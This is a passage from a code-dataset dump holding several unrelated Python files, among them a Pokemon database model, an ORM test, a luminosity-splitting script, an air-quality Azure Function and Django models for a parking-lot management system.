import *\n\nclass Pokemon(Base):\n __tablename__ = 'pokemons'\n\n name = db.Column(db.String(128), nullable =False, unique =True)\n attack = db.Column(db.Integer, nullable=False)\n capture_rate = db.Column(db.Integer, nullable=False)\n defense = db.Column(db.Integer, nullable=False)\n hp = db.Column(db.Integer, nullable=False)\n pokedex_number = db.Column(db.Integer, nullable=False)\n sp_attack = db.Column(db.Integer, nullable=False)\n sp_defense = db.Column(db.Integer, nullable=False)\n speed = db.Column(db.Integer, nullable=False)\n type1 = db.Column(db.String(128), nullable =False, unique =True)\n type2 = db.Column(db.String(128), nullable =False, unique =True)\n generation = db.Column(db.Integer, nullable=False)\n is_legendary = db.Column(db.Integer, nullable=False)\n #image = #figure something for image\n\n\n def __init__(self, **kwargs):\n\n self.name = kwargs.get('name', None)\n self.attack = kwargs.get('attack', None)\n self.capture_rate = kwargs.get('capture_rate', None)\n self.defense = kwargs.get('defense', None)\n self.hp = kwargs.get('hp', None)\n self.pokedex_number = kwargs.get('pokedex_number', None)\n self.sp_attack = kwargs.get('sp_attack', None)\n self.sp_defense = kwargs.get('sp_defense', None)\n self.sp_speed = kwargs.get('sp_speed', None)\n self.speed = kwargs.get('speed', None)\n self.type1 = kwargs.get('type1', None)\n self.type2 = kwargs.get('type2', None)\n self.generation = kwargs.get('generation', None)\n self.is_legendary = kwargs.get('is_legendary', None)\n self.image = kwargs.get('image', None)\n\n\n def __repr__(self):\n return str(self.__dict__)\n\n\n\n\nclass PokemonSchema(ModelSchema):\n class Meta:\n model = Pokemon\n","sub_path":"app/irsystem/models/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"635129310","text":"from nose.tools import assert_equal\nfrom collections import OrderedDict\nfrom sqlplain import orm, sql, core, db\n\n\nclass Stock(object):\n def __init__(self, code, market, quotes=()):\n self.code = code\n self.market = market\n self.quotes = OrderedDict(quotes) # {date: price}\n\n def some_financial_method(self):\n # do something with the quotes\n pass\n\n\ndef buildmodel():\n \"Build the schema and utility query methods if needed\"\n s = db.Schema([\n ['stock', ['code', 'market'], [], {}],\n ['stock_quote', ['code', 'market', 'date'], ['price'],\n {'code': 'stock.code', 'market': 'stock.market'}],\n ])\n\n # two convenience query methods\n s.stock.get_stock_quotes = s.stock.get_stock_quotes.order_by('date DESC')\n s.stock.del_stock_quotes = sql.Query(\n 'DELETE FROM stock_quote WHERE code=:code AND market=:market')\n\n return s\n\n\ndef object_db_mismatch(s):\n \"Defines how to store and retrieve business objects\"\n\n @orm.Manager.read.register(Stock)\n def readStock(manager, stock):\n \"Read all the quotes from the db\"\n row = manager.read(s.stock(stock.code, stock.market))\n if row is None:\n return\n for code, market, date, price in manager(row.get_stock_quotes):\n stock.quotes[date] = price\n return stock\n\n @orm.Manager.save.register(Stock)\n def saveStock(manager, stock):\n \"Save the stock and all of its quotes into the db\"\n code, market = stock.code, stock.market\n manager.save(s.stock(code, market))\n manager.savemany(s.stock_quote(code, market, date, price)\n for date, price in stock.quotes.items())\n\n @orm.Manager.delete.register(Stock)\n def deleteStock(manager, stock):\n \"Delete the stock 
and all of its quotes from the db\"\n row = s.stock(stock.code, stock.market)\n manager(row.del_stock_quotes)\n manager.delete(row)\n\ns = buildmodel()\nobject_db_mismatch(s)\n\n\ndef populate(manager):\n stock1 = Stock('PIPPO', 'ITALY', [\n ('2012-12-01', 2.333),\n ('2012-12-02', 2.350),\n ('2012-12-03', 2.150),\n ])\n stock2 = Stock('PLUTO', 'ITALY', [\n ('2012-12-01', 12.33),\n ('2012-12-02', 12.50),\n ('2012-12-03', 12.15),\n ])\n manager.save(stock1)\n manager.save(stock2)\n\n\ndef createstock(conn):\n conn.executescript('''\\\nCREATE TABLE stock(\ncode VARCHAR(32),\nmarket VARCHAR(32),\nPRIMARY KEY (code, market)\n);\n\nCREATE TABLE stock_quote(\ncode VARCHAR(32) REFERENCES stock(code) ON UPDATE CASCADE,\nmarket VARCHAR(32) REFERENCES stock(market) ON UPDATE CASCADE,\ndate DATE,\nprice FLOAT NOT NULL,\nPRIMARY KEY (code, market, date)\n);\n''')\n\n\ndef check_read(manager):\n expected_dates = ['2012-12-03', '2012-12-02', '2012-12-01']\n\n for row in manager(sql.select(s.stock)):\n stock = manager.read(Stock(*row))\n assert_equal(stock.quotes.keys(), expected_dates) # check the ordering\n assert_equal(len(stock.quotes), 3)\n\n\ndef check_delete(manager):\n stock = Stock('PIPPO', 'ITALY')\n manager.delete(stock)\n assert_equal(manager.read(stock), None)\n\n\ndef test():\n with core.ScratchDB('sqlite3:///stock.sqlite', createstock) as db:\n manager = orm.Manager(db.conn)\n populate(manager)\n yield check_read, manager\n yield check_delete, manager\n","sub_path":"doc/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"385912351","text":"##############################################################\n# #\n# Helper script that takes the output of CalcJSON.sh script #\n# sh CalcJSON.sh #\n# and splits it into fill-blocks #\n# #\n##############################################################\n\ndebug = False\ninput = \"LumiCalc_Moriond17.txt\"\nout = \"SplittedFills_Moriond17.txt\"\n\nprint(\"--------------------------------------\")\nprint(\" Splitting the JSON file into fills ...\" )\nprint(\"--------------------------------------\")\n\nwith open(input, \"r\") as Inp:\n print(\"Opening \" + input + \".\")\n run = []\n fill = []\n time = []\n nls = []\n ncms = []\n delivered = []\n recorded = []\n \n for line in Inp:\n if(line[0] != \"#\"):\n \n cleared_line = line.split(\",\")\n run_fill = cleared_line[0].split(\":\")\n run.append(run_fill[0])\n fill.append(run_fill[1])\n time.append(cleared_line[1])\n nls.append(cleared_line[2])\n ncms.append(cleared_line[3])\n delivered.append((cleared_line[4]))\n recorded.append(float(cleared_line[5]))\n\ncleared_fill = []\nfor i in fill:\n if i not in cleared_fill:\n cleared_fill.append(i)\n\nsum = 0\nrun_B = []\nrun_E = []\nfill_B = []\nfill_E = []\nLumiBlock_A = []\nn_runs = 0\ntotalLumi = 0\nj=0\n\nfor i in range(0, len(recorded)):\n sum += recorded[i]\n n_runs += 1\n if ( i == len(recorded)-1 or ((fill[i] == cleared_fill[j]) and fill[i+1] != cleared_fill[j])):\n LumiBlock_A.append(sum)\n run_B.append(run[i+1-n_runs])\n run_E.append(run[i])\n fill_B.append(fill[i+1-n_runs])\n fill_E.append(fill[i])\n n_runs = 0\n totalLumi += sum\n sum = 0\n if(j < len(cleared_fill) - 1):\n j+=1\n\nprint(min(LumiBlock_A))\nprint(max(LumiBlock_A))\nif(debug):\n for i in range(0, len(LumiBlock_A)):\n print(\"{0}:{1} - {2}:{3} block with LUMI: {4:.2f}\".format(run_B[i],fill_B[i],run_E[i],fill_E[i],LumiBlock_A[i]))\n\noutput = open(out,\"w\")
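\n# Output format: one line per fill block -- begin run, begin fill, end run, end fill, integrated luminosity.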
\nfor i in range(0, len(LumiBlock_A)):\n output.write(str(run_B[i]) + \" \" + str(fill_B[i]) + \" \" + str(run_E[i]) + \" \" + str(fill_E[i]) + \" \" + str(LumiBlock_A[i]) + \"\\n\")\n\nprint(\"Done!\\n\\n\" + str(totalLumi) + \" /fb split into \" + str(len(LumiBlock_A)) + \" blocks.\\nOutput written to \" + out + \".\")\n\n","sub_path":"JSON_calc/SplitPerFill.py","file_name":"SplitPerFill.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"277285356","text":"class jobOptionsRecData:\n\n def __init__( self, parametersList = None ):\n self.IncludeDict = {}\n self.IncludeDict['InputDataConversion'] = \"'$RAWDATACNVROOT/share/ReadRawDatajobOptions.txt'\"\n self.IncludeDict['TriggerMaker'] = \"'$TRIGMAKERALGROOT/share/jobOptions_TrigMakerAlg.txt'\"\n self.IncludeDict['EventLoop'] = \"'$OFFLINEEVENTLOOPMGRROOT/share/OfflineEventLoopMgr_Option.txt'\"\n self.IncludeDict['BackgroundMixing'] = None\n self.IncludeDict['CalibData'] = \"'$CALIBSVCROOT/share/job-CalibData.txt'\"\n self.IncludeDict['MagneticField'] = \"'$MAGNETICFIELDROOT/share/MagneticField.txt'\"\n self.IncludeDict['EventStartTime'] = \"'$ESTIMEALGROOT/share/job_EsTimeAlg.txt'\"\n self.IncludeDict['MdcRec'] = \"'$MDCXRECOROOT/share/jobOptions_MdcPatTsfRec.txt'\"\n self.IncludeDict['MdcKalmanRec'] = \"'$KALFITALGROOT/share/job_kalfit_numf_data.txt'\"\n self.IncludeDict['MdcDedxRec'] = \"'$MDCDEDXALGROOT/share/job_dedx_all.txt'\"\n self.IncludeDict['TrkExtRec'] = \"'$TRKEXTALGROOT/share/TrkExtAlgOption.txt'\"\n self.IncludeDict['TofRec'] = \"'$TOFRECROOT/share/jobOptions_TofRec.txt'\"\n self.IncludeDict['TofEnergyRec'] = \"'$TOFENERGYRECROOT/share/TofEnergyRecOptions_Data.txt'\"\n self.IncludeDict['EmcRec'] = \"'$EMCRECROOT/share/EmcRecOptions.txt'\"\n self.IncludeDict['EmcTimRec'] = \"'$EMCTIMERECROOT/share/EmcTimeRecOptions.txt'\"\n self.IncludeDict['MucRec'] = \"'$MUCRECALGROOT/share/jobOptions_MucRec.txt'\"\n self.IncludeDict['ROOTIO'] = \"'$ROOTIOROOT/share/jobOptions_Dst2Root_data.txt'\"\n self.IncludeDict['Calib'] = \"'$CALIBSVCROOT/share/calibConfig_rec_data.txt'\"\n self.IncludeDict['EventAssembly'] = \"'$EVENTASSEMBLYROOT/share/EventAssembly.txt'\"\n self.IncludeDict['PrimaryVertexFit'] = \"'$PRIMARYVERTEXALGROOT/share/jobOptions_kalman.txt'\"\n self.IncludeDict['VeeVertexFit'] = \"'$VEEVERTEXALGROOT/share/jobOptions_veeVertex.txt'\"\n self.IncludeDict['HltMaker'] = \"'$HLTMAKERALGROOT/share/jobOptions_HltMakerAlg.txt'\"\n self.IncludeDict['EventNavigator'] = None\n self.InList = ['InputDataConversion', 'TriggerMaker','EventLoop', 'BackgroundMixing', 'CalibData', 'MagneticField', 'EventStartTime', 'MdcRec', 'MdcKalmanRec', 'MdcDedxRec', 'TrkExtRec', 'TofRec', 'TofEnergyRec', 'EmcRec', 'EmcTimRec', 'MucRec', 'ROOTIO', 'Calib', 'EventAssembly', 'PrimaryVertexFit', 'VeeVertexFit', 'HltMaker', 'EventNavigator']\n\n\n self.ParametersDict = {}\n self.ParametersDict['input'] = []\n self.ParametersDict['output'] = []\n self.ParametersDict['OutputLevel'] = '5'\n self.ParametersDict['EventNumber'] = '50'\n self.PaList = ['input', 'output', 'OutputLevel', 'EventNumber']\n\n\n self.parametersList = parametersList\n\n\n #self.CosmicFlag = CosmicFlag\n #self.MFFlag = MFFlag\n\n def resolveParametersList( self ):\n if self.parametersList != None:\n for parameter in self.parametersList:\n name = parameter.getName()\n value = parameter.getValue()\n extra = parameter.getExtra()\n if name in self.InList:\n if value:\n self.IncludeDict[name] = \"'\" + 
value + \"'\"\n if extra:\n for ret in extra:\n self.IncludeDict[name] += '\\n'\n self.IncludeDict[name] += ret\n self.IncludeDict[name] += ';'\n if name in self.PaList:\n self.ParametersDict[name] = value\n return True\n\n def toTXT( self ):\n result = self.resolveParametersList()\n if result:\n ret = '//jobOptions_rec\\n'\n for k in self.InList:\n v = self.IncludeDict[k]\n if v:\n ret += '//%s\\n' % k\n ret += \"#include %s\\n\" % v\n for k in self.PaList:\n v = self.ParametersDict[k]\n if k == 'input' or k == 'output':\n ret += '\\n//I/O Assignment'\n if k == 'input':\n ret += '\\nEventCnvSvc.digiRootInputFile = {'\n for value in v:\n ret = ret + '\"' + value + '\" '\n ret += '};'\n elif k == 'output':\n ret += '\\nRootCnvSvc.digiRootOutputFile = '\n for value in v:\n ret = ret + '\"' + value + '\"'\n ret += ';'\n elif k == \"OutputLevel\":\n ret = ret + '\\n//' + k\n ret = ret + '\\nMessageSvc.OutputLevel = ' + v + ';'\n elif k == \"EventNumber\":\n ret = ret + '\\n//' + k\n ret = ret + '\\nApplicationMgr.EvtMax = ' + v + ';'\n return ret\n else:\n return False\n\n def toTXTFile( self, filename ):\n f = open( filename, 'w+')\n ret = self.toTXT()\n f.write( ret )\n f.close\n return filename\n","sub_path":"Core/Workflow/Utilities/jobOptions_rec_data.py","file_name":"jobOptions_rec_data.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"481202249","text":"import logging\n\nimport azure.functions as func\nimport os\nimport requests\nimport json\n\nCOULD_NOT_PARSE = \"Couldn't get the air pollution there\"\n\nQUALITY_INDEX = {1: \"Good\", 2: \"Fair\", 3: \"Moderate\", 4: \"Poor\", 5: \"Very Poor\"}\n\ndef getAQI(lat, lon):\n api_key = os.environ[\"API_key\"]\n url = f\"http://api.openweathermap.org/data/2.5/air_pollution?lat={lat}&lon={lon}&appid={api_key}\"\n resp = requests.get(url)\n if resp.status_code == 200:\n body = json.loads(resp.text)\n aqi = body['list'][0]['main']['aqi']\n return aqi\n return COULD_NOT_PARSE\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info('Python HTTP trigger function processed a request.')\n\n req_body = None;\n try:\n req_body = req.get_json()\n except ValueError:\n pass\n \n lattitude = req.params.get('lattitude')\n if not lattitude and req_body:\n lattitude = req_body.get('lattitude')\n longitude = req.params.get('longitude')\n if not longitude and req_body:\n longitude = req_body.get('longitude')\n\n if lattitude and longitude:\n air_pollution = getAQI(lattitude, longitude)\n if air_pollution != COULD_NOT_PARSE:\n return func.HttpResponse(f\"The AQI at that area is {QUALITY_INDEX[air_pollution]}.\", status_code=200)\n else:\n return func.HttpResponse(air_pollution, status_code=200)\n else:\n return func.HttpResponse(\n \"This HTTP triggered function executed successfully. 
Pass lattitude and longitude in the query string or request body to get the AQI at that location.\\n\\nExample:\\n{\\n\\t\\\"lattitude\\\": \\\"47.60357\\\"\\n\\t\\\"longitude\\\": \\\"-122.32945\\\"\\n}\",\n status_code=200\n )\n","sub_path":"GetAQI/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"491321108","text":"# _*_ coding:utf-8 _*_\n\nimport json\nimport time\n\nfrom model.data_model import *\nfrom flask import Blueprint,request\nfrom dao.slove_data import slove_data\nimport logging\nrecv_data_route = Blueprint('recv_data', __name__)\n\n@recv_data_route.route('/dsky',methods=['GET','POST'])\ndef recv_data():\n try:\n start = time.time()\n para = request.values.get('data');\n data = json.loads(para)\n detail_info_list= []\n master_info = Master_Info(data[\"id\"],\n data[\"mmac\"],\n data[\"rate\"],\n data[\"wssid\"],\n data[\"wmac\"])\n \n for e in data[\"data\"]:\n detail_info = Detail_Info(e[\"mac\"],\n e[\"rssi\"],\n e[\"ts\"],\n e[\"tmc\"],\n e[\"tc\"],\n e[\"ds\"],\n e[\"rec\"])\n detail_info_list.append(detail_info)\n \n \n \n mslove_data =slove_data()\n mslove_data.save_data(master_info, detail_info_list)\n \n end = time.time()\n logging.info(u'end request total time: %d',int(end-start))\n except: \n import sys\n ExecInfo = sys.exc_info()\n logging.error(ExecInfo[1])\n raise Exception(ExecInfo[1])\n return \"Done\"\n","sub_path":"source/action/recv_data_action.py","file_name":"recv_data_action.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"486267069","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport os\n\nfrom django.contrib.auth.models import User\nfrom django.core.validators import RegexValidator\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.template import Context, Template\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom utils import constants, common\nfrom utils.django_base import BaseModel\nfrom utils.mail import EbMail\n\nlogger = common.get_ap_logger()\n\n\n# Create your models here.\nclass Config(BaseModel):\n group = models.CharField(max_length=50, verbose_name=\"グループ\")\n name = models.CharField(max_length=50, primary_key=True, verbose_name=\"設定名\")\n value = models.CharField(max_length=2000, verbose_name=\"設定値\")\n comment = models.TextField(max_length=255, blank=True, null=True, verbose_name=\"備考\")\n\n class Meta:\n ordering = ['group', 'name']\n verbose_name = verbose_name_plural = \"システム設定\"\n db_table = 'mst_config'\n\n def __str__(self):\n return self.name\n\n @classmethod\n def get_value_by_name(cls, group, name, default_value=None, comment=None):\n try:\n value = Config.objects.get(name=name).value\n return value\n except ObjectDoesNotExist:\n if default_value is not None:\n Config.objects.create(group=group, name=name, value=default_value, comment=comment)\n return default_value\n\n @classmethod\n def get_circle_radius(cls):\n \"\"\"Return the radius in meters used when drawing a circle on the map.\n\n Falls back to the default of 2000 meters if the lookup fails.\n\n :return:\n \"\"\"\n default = 2000\n try:\n circle = Config.objects.get(name=constants.CONFIG_CIRCLE_RADIUS).value\n try:\n return int(circle)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:
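\n # Lookup failed: persist the default so the config row exists for later reads.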
\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_CIRCLE_RADIUS,\n value=default)\n return default\n\n @classmethod\n def get_domain_name(cls):\n default = 'https://ap.mopa.jp'\n try:\n return Config.objects.get(name=constants.CONFIG_DOMAIN_NAME).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_DOMAIN_NAME,\n value=default)\n return default\n\n @classmethod\n def get_page_size(cls):\n \"\"\"\n\n :return:\n \"\"\"\n default = 25\n try:\n value = Config.objects.get(name=constants.CONFIG_PAGE_SIZE).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_PAGE_SIZE, value=default)\n return default\n\n @classmethod\n def get_decimal_type(cls):\n \"\"\"Return the handling mode for decimal fractions.\n\n :return:\n \"\"\"\n default = '0'\n try:\n return Config.objects.get(name=constants.CONFIG_DECIMAL_TYPE).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_DECIMAL_TYPE,\n value=default)\n return default\n\n @classmethod\n def get_consumption_tax_rate(cls):\n \"\"\"Return the consumption tax rate.\n\n :return:\n \"\"\"\n default = 0.08\n try:\n value = Config.objects.get(name=constants.CONFIG_CONSUMPTION_TAX_RATE).value\n try:\n return float(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_CONSUMPTION_TAX_RATE,\n value=default)\n return default\n\n @classmethod\n def get_car_length_adjust(cls):\n \"\"\"Adjustment value for the overall car length.\n\n :return:\n \"\"\"\n default = 0\n try:\n value = Config.objects.get(name=constants.CONFIG_CAR_LENGTH_ADJUST).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_ADJUST_SIZE, name=constants.CONFIG_CAR_LENGTH_ADJUST,\n value=default)\n return default\n\n @classmethod\n def get_car_width_adjust(cls):\n \"\"\"Adjustment value for the overall car width.\n\n :return:\n \"\"\"\n default = 0\n try:\n value = Config.objects.get(name=constants.CONFIG_CAR_WIDTH_ADJUST).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_ADJUST_SIZE, name=constants.CONFIG_CAR_WIDTH_ADJUST,\n value=default)\n return default\n\n @classmethod\n def get_car_height_adjust(cls):\n \"\"\"Adjustment value for the overall car height.\n\n :return:\n \"\"\"\n default = 0\n try:\n value = Config.objects.get(name=constants.CONFIG_CAR_HEIGHT_ADJUST).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_ADJUST_SIZE, name=constants.CONFIG_CAR_HEIGHT_ADJUST,\n value=default)\n return default\n\n @classmethod\n def get_car_weight_adjust(cls):\n \"\"\"Adjustment value for the car weight.\n\n :return:\n \"\"\"\n default = 0\n try:\n value = Config.objects.get(name=constants.CONFIG_CAR_WEIGHT_ADJUST).value\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_ADJUST_SIZE, name=constants.CONFIG_CAR_WEIGHT_ADJUST,\n value=default)\n return default\n\n @classmethod\n def get_url_timeout(cls):\n \"\"\"Return the URL timeout.\n\n The configured value is in hours, but the value returned here is in seconds.\n\n :return:\n \"\"\"\n default = 3600 * 24\n try:
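\n # The configured value is in hours; it is converted to seconds before being returned.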
Config.objects.get(name=constants.CONFIG_URL_TIMEOUT).value\n try:\n return int(float(value) * 3600)\n except Exception as ex:\n logger.error(ex)\n return default\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_URL_TIMEOUT, value=24)\n return default\n\n @classmethod\n def get_gcm_url(cls):\n default = 'https://fcm.googleapis.com/fcm/send'\n try:\n return Config.objects.get(name=constants.CONFIG_GCM_URL).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_GCM_URL, value=default)\n return default\n\n @classmethod\n def get_firebase_serverkey(cls):\n default = ''\n try:\n return Config.objects.get(name=constants.CONFIG_FIREBASE_SERVERKEY).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_SYSTEM, name=constants.CONFIG_FIREBASE_SERVERKEY,\n value=default)\n return default\n\n @classmethod\n def get_google_map_key(cls):\n default = ''\n try:\n return Config.objects.get(name=constants.CONFIG_GOOGLE_MAP_KEY).value\n except ObjectDoesNotExist:\n Config.objects.create(group=constants.CONFIG_GROUP_GOOGLE, name=constants.CONFIG_GOOGLE_MAP_KEY,\n value=default)\n return default\n\n @classmethod\n def get_yahoo_app_id(cls):\n default = ''\n return cls.get_value_by_name(constants.CONFIG_GROUP_YAHOO, name=constants.CONFIG_YAHOO_APP_KEY,\n default_value=default)\n\n @classmethod\n def get_furigana_service(cls):\n default = ''\n return cls.get_value_by_name(constants.CONFIG_GROUP_YAHOO, name=constants.CONFIG_FURIGANA_SERVICE_URL,\n default_value=default)\n\n @classmethod\n def get_parking_lot_key_alert_percent(cls):\n \"\"\"駐車場の残り鍵警告比率\n\n :return:\n \"\"\"\n default = 0.3\n try:\n value = cls.get_value_by_name(\n constants.CONFIG_GROUP_SYSTEM, constants.CONFIG_PARKING_LOT_KEY_ALERT_PERCENT, default_value=default\n )\n return float(value)\n except Exception as ex:\n logger.error(ex)\n return default\n\n @classmethod\n def get_simple_subscription_persist_time(cls):\n \"\"\"申込みフォーム入力完了後の仮押さえ時間\n\n :return:\n \"\"\"\n default = 24\n value = cls.get_value_by_name(constants.CONFIG_GROUP_SYSTEM,\n name=constants.CONFIG_SIMPLE_SUBSCRIPTION_PERSIST_TIME,\n default_value=default,\n comment='申込みフォーム入力完了後の仮押さえ時間')\n try:\n return int(value)\n except Exception as ex:\n logger.error(ex)\n return default\n\n\nclass Company(BaseModel):\n name = models.CharField(unique=True, max_length=30, verbose_name=\"会社名\")\n kana = models.CharField(blank=True, null=True, max_length=30, verbose_name=\"フリカナ\")\n president = models.CharField(blank=True, null=True, max_length=30, verbose_name=\"代表者名\")\n post_code = models.CharField(blank=True, null=True, max_length=8, verbose_name=\"郵便番号\")\n address1 = models.CharField(blank=True, null=True, max_length=200, verbose_name=\"住所1\")\n address2 = models.CharField(blank=True, null=True, max_length=200, verbose_name=\"住所2\")\n tel = models.CharField(blank=True, null=True, max_length=15, verbose_name=\"電話番号\",\n validators=(RegexValidator(regex=constants.REG_TEL),))\n fax = models.CharField(blank=True, null=True, max_length=15, verbose_name=\"ファックス\",\n validators=(RegexValidator(regex=constants.REG_TEL),))\n email = models.EmailField(blank=True, null=True, verbose_name=\"メール\")\n\n class Meta:\n db_table = 'ap_company'\n verbose_name = verbose_name_plural = \"自社情報\"\n\n def __str__(self):\n return self.name\n\n @classmethod\n def get_company(cls):\n \"\"\"自社情報を取得する。\n\n :return:\n \"\"\"\n return 
Company.objects.public_all().first()\n\n\nclass CarMaker(BaseModel):\n name = models.CharField(max_length=50, unique=True, verbose_name=\"メーカー\")\n\n class Meta:\n db_table = 'mst_car_maker'\n ordering = ['name']\n verbose_name = \"メーカー\"\n verbose_name_plural = \"メーカー一覧\"\n\n def __str__(self):\n return self.name\n\n\nclass CarModel(BaseModel):\n maker = models.ForeignKey(CarMaker, on_delete=models.PROTECT, verbose_name=\"メーカー\")\n name = models.CharField(max_length=100, verbose_name=\"車種\")\n grade_name = models.CharField(max_length=100, blank=True, null=True, verbose_name=\"グレード名\")\n sale_date = models.DateField(blank=True, null=True, verbose_name=\"発売年度\")\n length = models.IntegerField(blank=False, null=True, verbose_name=\"全長\")\n width = models.IntegerField(blank=False, null=True, verbose_name=\"全幅\")\n height = models.IntegerField(blank=False, null=True, verbose_name=\"全高\")\n weight = models.IntegerField(blank=False, null=True, verbose_name=\"重量\")\n f_value = models.IntegerField(blank=False, null=True, verbose_name=\"F値\")\n r_value = models.IntegerField(blank=False, null=True, verbose_name=\"R値\")\n min_height = models.IntegerField(blank=False, null=True, verbose_name=\"メーカーの地上最低高\")\n\n class Meta:\n db_table = 'mst_car_model'\n ordering = ['name']\n unique_together = ('maker', 'name', 'grade_name')\n verbose_name = \"車種\"\n verbose_name_plural = \"車種一覧\"\n\n def __str__(self):\n if self.grade_name:\n return '%s - %s ' % (self.name, self.grade_name)\n else:\n return self.name\n\n\nclass Bank(BaseModel):\n code = models.CharField(max_length=4, verbose_name=\"金融機関コード\")\n name = models.CharField(max_length=30, verbose_name=\"金融機関名称\")\n kana = models.CharField(blank=True, null=True, max_length=30, verbose_name=\"金融機関カナ\")\n\n class Meta:\n db_table = 'mst_bank'\n ordering = ['code']\n verbose_name = \"金融機関\"\n verbose_name_plural = \"金融機関一覧\"\n\n def __str__(self):\n return self.name\n\n\nclass BankAccount(BaseModel):\n bank = models.ForeignKey(Bank, verbose_name=\"銀行\")\n branch_no = models.CharField(max_length=7, verbose_name=\"支店番号\")\n branch_name = models.CharField(max_length=20, verbose_name=\"支店名称\")\n account_type = models.CharField(max_length=1, choices=constants.CHOICE_BANK_ACCOUNT_TYPE, verbose_name=\"預金種類\")\n account_number = models.CharField(max_length=7, verbose_name=\"口座番号\")\n account_holder = models.CharField(blank=True, null=True, max_length=30, verbose_name=\"口座名義\")\n\n class Meta:\n db_table = 'mst_bank_account'\n ordering = ['bank', 'branch_no']\n unique_together = ('branch_no', 'account_number')\n verbose_name = \"銀行口座\"\n verbose_name_plural = \"銀行口座一覧\"\n\n def __str__(self):\n return self.branch_no\n\n\nclass TransmissionRoute(BaseModel):\n name = models.CharField(max_length=50, unique=True, verbose_name=\"名称\")\n price_kbn = models.CharField(max_length=2, blank=True, null=True, verbose_name=\"金額区分\",\n choices=constants.CHOICE_PRICE_KBN)\n\n class Meta:\n db_table = 'mst_transmission_route'\n ordering = ['id']\n verbose_name = \"媒体\"\n verbose_name_plural = \"媒体一覧\"\n\n def __str__(self):\n return self.name\n\n\nclass Mediation(BaseModel):\n name = models.CharField(max_length=50, unique=True, verbose_name=\"業者名称\")\n\n class Meta:\n db_table = 'mst_mediation'\n ordering = ['name']\n verbose_name = \"仲介業者\"\n verbose_name_plural = \"仲介業者一覧\"\n\n def __str__(self):\n return self.name\n\n\nclass Payment(BaseModel):\n name = models.CharField(max_length=30, unique=True, verbose_name=\"入金項目\")\n timing = models.CharField(max_length=2, 
choices=constants.CHOICE_PAY_TIMING, verbose_name=\"タイミング\")\n amount = models.IntegerField(blank=True, null=True, verbose_name=\"デフォールト金額\")\n consumption_tax_kbn = models.CharField(max_length=1, default=1, choices=constants.CHOICE_TAX_KBN,\n verbose_name=\"消費税\")\n is_initial = models.BooleanField(default=False, verbose_name=\"初期作成\")\n is_active = models.BooleanField(default=True, verbose_name=\"有効\")\n comment = models.CharField(max_length=255, blank=True, null=True, verbose_name=\"備考\")\n\n class Meta:\n db_table = 'mst_payment'\n ordering = ['timing', 'name']\n verbose_name = \"入金項目\"\n verbose_name_plural = \"入金項目一覧\"\n\n def __str__(self):\n return self.name\n\n def get_consumption_tax(self, amount=None):\n \"\"\"消費税を取得する。\n\n :param amount:\n :return:\n \"\"\"\n amount = amount if amount else self.amount\n if not amount:\n return 0\n if self.consumption_tax_kbn == '1':\n rate = Config.get_consumption_tax_rate()\n # 税抜の場合\n return common.get_consumption_tax(amount, rate, Config.get_decimal_type())\n else:\n return 0\n\n\nclass ReportFormat(BaseModel):\n path = models.FileField(upload_to=common.get_parking_lot_doc_path)\n kbn = models.CharField(max_length=3, choices=constants.CHOICE_REPORT_KBN, verbose_name=\"帳票区分\")\n comment = models.CharField(max_length=255, blank=True, null=True, verbose_name=\"備考\")\n order = models.SmallIntegerField(editable=False, verbose_name=\"並び順\")\n\n class Meta:\n db_table = 'mst_report_format'\n ordering = ['kbn']\n verbose_name = \"帳票フォーマット\"\n verbose_name_plural = \"帳票フォーマット一覧\"\n\n def __str__(self):\n return os.path.basename(str(self.path))\n\n\nclass MailTemplate(BaseModel):\n title = models.CharField(max_length=50, verbose_name=\"送信メールのタイトル\")\n body = models.TextField(verbose_name=\"メール本文\")\n password = models.TextField(blank=True, null=True, 